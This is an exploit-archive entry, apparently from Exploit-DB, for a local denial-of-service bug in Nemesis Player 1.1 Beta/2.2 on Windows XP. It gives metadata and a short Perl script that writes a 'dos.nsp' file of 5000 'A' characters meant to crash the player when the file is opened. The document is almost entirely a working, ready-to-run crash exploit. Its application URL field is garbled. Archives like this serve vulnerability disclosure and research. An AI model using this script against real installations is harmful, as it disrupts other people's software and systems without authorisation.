[] NeoSense

Nemesis Player (NSP) - Local Denial of Service

Author: Rehan Ahmed
type: dos
platform: windows
port: 
date_added: 2010-01-12 
date_updated:  
verified: 1 
codes: OSVDB-63688 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comNSP_1.1_Setup.exe

#!/usr/bin/perl
#Exploit Title: Nemesis Player (NSP) Local Denial of Service (DoS) Vulnerability
#Author:Vulnerability Discovered By Rehan Ahmed (rehan@rewterz.com)
#Vendor:http://www.nsplayer.org
#Version:1.1 Beta/2.2
#Tested On: WinXP SP2

my $boom="\x41" x 5000;
my $file="dos.nsp";
open($FILE,">$file");
print $FILE $boom;
close($FILE);
print "File Successfully Created\n";